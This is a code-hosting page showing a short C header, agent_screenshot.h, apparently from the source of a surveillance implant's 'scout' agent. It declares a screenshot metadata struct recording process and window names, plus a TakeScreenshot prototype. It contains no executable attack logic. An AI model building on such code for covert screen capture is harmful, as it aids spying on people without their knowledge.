hackedteam/scout-win

View on GitHub
core-scout-win32/agent_screenshot.h

Summary

Maintainability
Test Coverage
#ifndef _DEVICE_SCREENSHOT
#define _DEVICE_SCREENSHOT

#define LOG_SNAP_VERSION 2009031201

typedef struct _SNAPSHOT_ADDITION_HEADER {
    UINT uVersion;
    UINT uProcessNameLen;
    UINT uWindowNameLen;
} SNAPSHOT_ADDITIONAL_HEADER, *PSNAPSHOT_ADDITIONAL_HEADER;


PBYTE TakeScreenshot(PULONG uOut);


#endif